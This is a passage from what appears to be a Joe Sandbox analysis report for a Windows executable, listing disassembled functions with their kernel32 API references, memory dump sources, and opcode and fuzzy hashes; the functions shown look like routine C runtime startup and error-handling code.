Instruction Fuzzy Hash: 68316336608B8186D760DF25E8403AEB7A0FB887A5FD00536EA9D53B58DF3CC156C710

Function 00007FF7D77F18C8 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF7D77F18E4
RtlCaptureContext.KERNEL32 ref: 00007FF7D77F1911
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7D77F192B
RtlVirtualUnwind.KERNEL32 ref: 00007FF7D77F196C
IsDebuggerPresent.KERNEL32 ref: 00007FF7D77F19C0
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7D77F19DD
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7D77F19E8

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1e2cc736c57cc4fab42b8577c53b5fc89e16aa7390849912aa6135476777de7e
Instruction ID: d206b97995c8c4f99ed81df804e481e1683a4d3aca6636d2954e4d526e0f1878
Opcode Fuzzy Hash: 1e2cc736c57cc4fab42b8577c53b5fc89e16aa7390849912aa6135476777de7e
Instruction Fuzzy Hash: 63316072605B8186EB609F60E8403EDB7B1FB44755F84443ADA4D57B98DF3CC159C720

Function 00007FF7D77F17A0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7D77F17CC
GetCurrentThreadId.KERNEL32 ref: 00007FF7D77F17DA
GetCurrentProcessId.KERNEL32 ref: 00007FF7D77F17E6
QueryPerformanceCounter.KERNEL32 ref: 00007FF7D77F17F6

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 6ef71be0335d771916a3e36a0986b7e559f500fd36b780a2cbd914a71aaf017c
Instruction ID: 285a3ee92abd902bf29ce18c8306c66b75c0fe4acf769e89191b4174799d4a44
Opcode Fuzzy Hash: 6ef71be0335d771916a3e36a0986b7e559f500fd36b780a2cbd914a71aaf017c
Instruction Fuzzy Hash: DD115E22B15F018AEB00DF60E8442BC77A4FB19759F840E36EA2D52BA4DF3CD16A8350

Function 00007FF7D77F12C4 Relevance: 4.5, APIs: 3, Instructions: 13COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?,?,00000001,00007FF7D77F13C5,?,?,?,?,?,?,00007FF7D77F6EF7), ref: 00007FF7D77F12CF
UnhandledExceptionFilter.KERNEL32(?,?,00000001,00007FF7D77F13C5,?,?,?,?,?,?,00007FF7D77F6EF7), ref: 00007FF7D77F12D8
GetCurrentProcess.KERNEL32(?,?,00000001,00007FF7D77F13C5,?,?,?,?,?,?,00007FF7D77F6EF7), ref: 00007FF7D77F12DE

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CurrentProcess
String ID:
API String ID: 1249254920-0
Opcode ID: f56c97781dd58d2aab377304fd46c3a154d589c5ff6358886a302790afab6230
Instruction ID: 2077bab015d42caa5de2b65517e06169b28d0d951831224a5912a304d58b894c
Opcode Fuzzy Hash: f56c97781dd58d2aab377304fd46c3a154d589c5ff6358886a302790afab6230
Instruction Fuzzy Hash: DAD0C965E1AA06C6FB383B62AC1513D96E0BB5CB52FC4503ACA0F66760DD3C94AB8710

Function 00007FF7D77FC9FC Relevance: 2.8, Strings: 2, Instructions: 299COMMON

Download Yara Rule

Strings

Syst, xrefs: 00007FF7D77FCA3F
emRo, xrefs: 00007FF7D77FCA48

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: Heap$AllocErrorFreeLast
String ID: Syst$emRo
API String ID: 796569475-2127360862
Opcode ID: 165de4f479d4a91bf291f81944976367129979d583b2d129c93f29d3d3a2abed
Instruction ID: 28c459c0806d1af7ec1c9a2de0b4cfec0e14ae2b5e059407c3bea6100ab5ac1b
Opcode Fuzzy Hash: 165de4f479d4a91bf291f81944976367129979d583b2d129c93f29d3d3a2abed
Instruction Fuzzy Hash: FFB19E22E0969645FB14EB259A412BEE690AB4ABA4FC44D33DE5E477C5DE3CE443C320

Function 00007FF7D77F7B00 Relevance: 2.8, Strings: 2, Instructions: 254COMMON

Download Yara Rule

Strings

PATH, xrefs: 00007FF7D77F7BF6
\, xrefs: 00007FF7D77F7CB0

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID: PATH$\
API String ID: 1010374628-1896636505
Opcode ID: f6fd6959d7f68e8fcbf405029f7cbb06076d842b06dfa883a0a39c5443146606
Instruction ID: b1a31c0f35ba60aa66cb845154c8e4f1adcb4834a952bc2d82eff02769495179
Opcode Fuzzy Hash: f6fd6959d7f68e8fcbf405029f7cbb06076d842b06dfa883a0a39c5443146606
Instruction Fuzzy Hash: 1291A021F0864245FB64BE658A512BDE6A4AF4A7B4FD44C37DE1E073C5DE3CE85382A0

Function 00007FF7D7800AC8 Relevance: 1.7, APIs: 1, Instructions: 227COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 00007FF7D7800D28

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 0aee2c9d0f18cba717c6b48c91b30045862c663ab1028652cf8fb080adae6bc7
Instruction ID: 657ad3764d250a250899b274627e1bfa54f0ff136656130c7405b70916e77b75
Opcode Fuzzy Hash: 0aee2c9d0f18cba717c6b48c91b30045862c663ab1028652cf8fb080adae6bc7
Instruction Fuzzy Hash: 9AB17E73604B898BEB15DF29C84636C7BE0F744B59F988922DB5D837A4CB39D462C710

Function 00007FF7D77F8D4C Relevance: 1.6, APIs: 1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63a9441564c6a6f7ad47481ba519d67710061313537eb3387148ab9bda94a5b2
Instruction ID: 0b9d7708091057279796f5beeb126d306bbdc44bd9c0bfcf7d531c43002bf84c
Opcode Fuzzy Hash: 63a9441564c6a6f7ad47481ba519d67710061313537eb3387148ab9bda94a5b2
Instruction Fuzzy Hash: D051D622B0869199F710AB76E9402AEFBA1FB487E4FD44536EE5C67B95DF3CD0028710

Function 00007FF7D77FBC8C Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7D77FBC90

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: a9de5ba3fd7cfbb2cf2c222749f0b54522bbda6840c06eddc72199e7cf4c48a5
Instruction ID: 6a64feb306d39fc5ebf06df0a1a96c01753db65ab71cadcaf0229676925cf4ec
Opcode Fuzzy Hash: a9de5ba3fd7cfbb2cf2c222749f0b54522bbda6840c06eddc72199e7cf4c48a5
Instruction Fuzzy Hash: F9B09224E0BB02C2EA087B216C5221866E47F48742FC4813EC00D71320DF2C20B64720

Function 00007FF7D77F6534 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 3bc380baf2909513d8a9c9c92a9fc896cd128b164f89aa194586654fdbad9b9d
Instruction ID: 9d98af338c81168623f17065721e2d788da71ba2e36fef2bc8464b52fe690905
Opcode Fuzzy Hash: 3bc380baf2909513d8a9c9c92a9fc896cd128b164f89aa194586654fdbad9b9d
Instruction Fuzzy Hash: 0241BC22714A5586EF08DF2ADA1426DE7A1BB48FD4BC99437EE0D97B68DE3CD0438300

Function 00007FF7D7800910 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c71b91569a50448bf070d4a20d718331527b6013442c525b41983b39e46376b6
Instruction ID: 3426b8c6d9aafb32345258335822972ad49ade5c9f5a491d6fe874abe653a912
Opcode Fuzzy Hash: c71b91569a50448bf070d4a20d718331527b6013442c525b41983b39e46376b6
Instruction Fuzzy Hash: 7AF049B27282554BD7A8AF28A4036297BD0F7043D5BD4443ED68D83E14DA3D90618F14

Function 00007FF7D77F1A6C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf57e7cebe62e32071d2e79a6c6e283744fb2ccd3a5019868eb404209e5635eb
Instruction ID: e14a19f4bb10306d62b015e995a2f47ce5479af8fc03b5f14a64f202de2b4a98
Opcode Fuzzy Hash: cf57e7cebe62e32071d2e79a6c6e283744fb2ccd3a5019868eb404209e5635eb
Instruction Fuzzy Hash: BAA0012691A90290E614AB10A950978A670BB58311BC04836C41D61864DE2CA5128320

Function 00007FF7D77F2384 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF7D77F2636,?,?,?,00007FF7D77F2328,?,?,?,00007FF7D77F1F31), ref: 00007FF7D77F2409
GetLastError.KERNEL32(?,?,?,00007FF7D77F2636,?,?,?,00007FF7D77F2328,?,?,?,00007FF7D77F1F31), ref: 00007FF7D77F2417
LoadLibraryExW.KERNEL32(?,?,?,00007FF7D77F2636,?,?,?,00007FF7D77F2328,?,?,?,00007FF7D77F1F31), ref: 00007FF7D77F2441
FreeLibrary.KERNEL32(?,?,?,00007FF7D77F2636,?,?,?,00007FF7D77F2328,?,?,?,00007FF7D77F1F31), ref: 00007FF7D77F24AF
GetProcAddress.KERNEL32(?,?,?,00007FF7D77F2636,?,?,?,00007FF7D77F2328,?,?,?,00007FF7D77F1F31), ref: 00007FF7D77F24BB

Strings

api-ms-, xrefs: 00007FF7D77F2429

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: c0e677ed793f07be15bbd36608866950c17eb8dc52562955832ce40533d26d5f
Instruction ID: 9dd28da57ddf722aacf3efe8f0f2b28a4e8dc1a917375cff8a35dea5dfca08ea
Opcode Fuzzy Hash: c0e677ed793f07be15bbd36608866950c17eb8dc52562955832ce40533d26d5f
Instruction Fuzzy Hash: FB317031B1A642A1EE21BB0699005BDE6D4BF48BB0FD94936DD2D4B794DE7CE8468220

Function 00007FF7D77F8590 Relevance: 10.6, APIs: 7, Instructions: 62COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7D77F859F
FlsGetValue.KERNEL32 ref: 00007FF7D77F85B4
FlsSetValue.KERNEL32 ref: 00007FF7D77F85D5
FlsSetValue.KERNEL32 ref: 00007FF7D77F8602
FlsSetValue.KERNEL32 ref: 00007FF7D77F8613
FlsSetValue.KERNEL32 ref: 00007FF7D77F8624
SetLastError.KERNEL32 ref: 00007FF7D77F863F

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 34f6f251a0c4e3579f44ea396bdba586a1f3d1e301c0d4045c909f7018b6911a
Instruction ID: c4bb92570a6483d6f299187bb7ee2fad892432eb804bded90b035cd1f31ed863
Opcode Fuzzy Hash: 34f6f251a0c4e3579f44ea396bdba586a1f3d1e301c0d4045c909f7018b6911a
Instruction Fuzzy Hash: 8B217920B4D65282FA68B7319B411BDD1826F487B0FD44E3BED3E07BD6DE2CA4434620

Function 00007FF7D78003D4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF7D7800405
GetLastError.KERNEL32 ref: 00007FF7D7800411
CloseHandle.KERNEL32 ref: 00007FF7D7800429
CreateFileW.KERNEL32 ref: 00007FF7D7800454
WriteConsoleW.KERNEL32 ref: 00007FF7D7800473

Strings

CONOUT$, xrefs: 00007FF7D7800435

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 99da74fdfd8441b8e67a49d275e64181827fc904707b12b643c5eb1f68a84888
Instruction ID: ac61ebcdf42034c3bdc6d84795ec8816d78e64165417ecba0cdcb47d4f5f37c2
Opcode Fuzzy Hash: 99da74fdfd8441b8e67a49d275e64181827fc904707b12b643c5eb1f68a84888
Instruction Fuzzy Hash: BE11D621718B4186E350AB12E84432DBAE0FB88FE6FC04235EA5D93BA4CF3CD5658754

Function 00007FF7D77F8708 Relevance: 9.1, APIs: 6, Instructions: 57COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00000000,00007FF7D77F71C5,?,?,?,?,00007FF7D77F7251), ref: 00007FF7D77F8717
FlsSetValue.KERNEL32(?,?,00000000,00007FF7D77F71C5,?,?,?,?,00007FF7D77F7251), ref: 00007FF7D77F874D
FlsSetValue.KERNEL32(?,?,00000000,00007FF7D77F71C5,?,?,?,?,00007FF7D77F7251), ref: 00007FF7D77F877A
FlsSetValue.KERNEL32(?,?,00000000,00007FF7D77F71C5,?,?,?,?,00007FF7D77F7251), ref: 00007FF7D77F878B
FlsSetValue.KERNEL32(?,?,00000000,00007FF7D77F71C5,?,?,?,?,00007FF7D77F7251), ref: 00007FF7D77F879C
SetLastError.KERNEL32(?,?,00000000,00007FF7D77F71C5,?,?,?,?,00007FF7D77F7251), ref: 00007FF7D77F87B7

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 4de0077a101ea52551fe941eda70405f4ff8b7a7846e0f5ccc5d3383e96223a6
Instruction ID: 7e61909cf77e51cee36345b7d96308e53620d3bad1095669970a80e70291b134
Opcode Fuzzy Hash: 4de0077a101ea52551fe941eda70405f4ff8b7a7846e0f5ccc5d3383e96223a6
Instruction Fuzzy Hash: BA116A20A4D65282FA54B7715B812BDE2826F8C7B0FD44F36ED3E167D6DE2CA4834670

Function 00007FF7D77FED58 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,COMSPEC,?,?,?,?,00000000,00000000,00007FF7D77FED43,00000000), ref: 00007FF7D77FEE74
GetLastError.KERNEL32(?,?,?,?,?,?,?,COMSPEC,?,?,?,?,00000000,00000000,00007FF7D77FED43,00000000), ref: 00007FF7D77FEEFF

Strings

COMSPEC, xrefs: 00007FF7D77FED61

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID: COMSPEC
API String ID: 953036326-1631433037
Opcode ID: 05dd62fe37837f8303dbc443535fa8bb0844c069da3d2955d1cf2a6dd334d750
Instruction ID: e6483e7ac997951516345ce79609666de6c24de95faf5e4a5ffe2605a13a8e66
Opcode Fuzzy Hash: 05dd62fe37837f8303dbc443535fa8bb0844c069da3d2955d1cf2a6dd334d750
Instruction Fuzzy Hash: 0691B432A1865185F750AF2595402BDEBE0BB08BA8FD4493FDE4E67A94DF78E443C720

Function 00007FF7D77F6200 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF7D77F6225
GetProcAddress.KERNEL32 ref: 00007FF7D77F623B
FreeLibrary.KERNEL32 ref: 00007FF7D77F6262

Strings

mscoree.dll, xrefs: 00007FF7D77F621C
CorExitProcess, xrefs: 00007FF7D77F6234

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 614fdb69e2b955a1ba9290f5b6657808dc47bdef6ca2d0ebcf70e20f56212b4b
Instruction ID: 2dffb89a530cb3e5fe695b93f3eb902aaaa4b5566392d5f39cd3c051eda40466
Opcode Fuzzy Hash: 614fdb69e2b955a1ba9290f5b6657808dc47bdef6ca2d0ebcf70e20f56212b4b
Instruction Fuzzy Hash: C2F06221B09A0281EB20AB24E84433DD7A0FF8A772FD4073BC96E555E4DF2CD456C720

Function 00007FF7D77F87D0 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF7D77F6D43,?,?,00000000,00007FF7D77F6FDE,?,?,?,?,00000000,00007FF7D77F6F6A), ref: 00007FF7D77F87EF
FlsSetValue.KERNEL32(?,?,?,00007FF7D77F6D43,?,?,00000000,00007FF7D77F6FDE,?,?,?,?,00000000,00007FF7D77F6F6A), ref: 00007FF7D77F880E
FlsSetValue.KERNEL32(?,?,?,00007FF7D77F6D43,?,?,00000000,00007FF7D77F6FDE,?,?,?,?,00000000,00007FF7D77F6F6A), ref: 00007FF7D77F8836
FlsSetValue.KERNEL32(?,?,?,00007FF7D77F6D43,?,?,00000000,00007FF7D77F6FDE,?,?,?,?,00000000,00007FF7D77F6F6A), ref: 00007FF7D77F8847
FlsSetValue.KERNEL32(?,?,?,00007FF7D77F6D43,?,?,00000000,00007FF7D77F6FDE,?,?,?,?,00000000,00007FF7D77F6F6A), ref: 00007FF7D77F8858

Memory Dump Source

Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true

Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 31a2b18a2a523ff214017227f7d28ac857d9b5c6cbf883e8abd30d4b04b11b01
Instruction ID: 21dec0ddbb516aaba61953a552d48cd0c26f41ef610758e0df150a1b8dab4b8c
Opcode Fuzzy Hash: 31a2b18a2a523ff214017227f7d28ac857d9b5c6cbf883e8abd30d4b04b11b01
Instruction Fuzzy Hash: 80116A60E5965281FA58B335AA811BDE1925F483B0FC84B36ED3E167E6DE2CE4434620

Function 00007FF7D77F8664 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

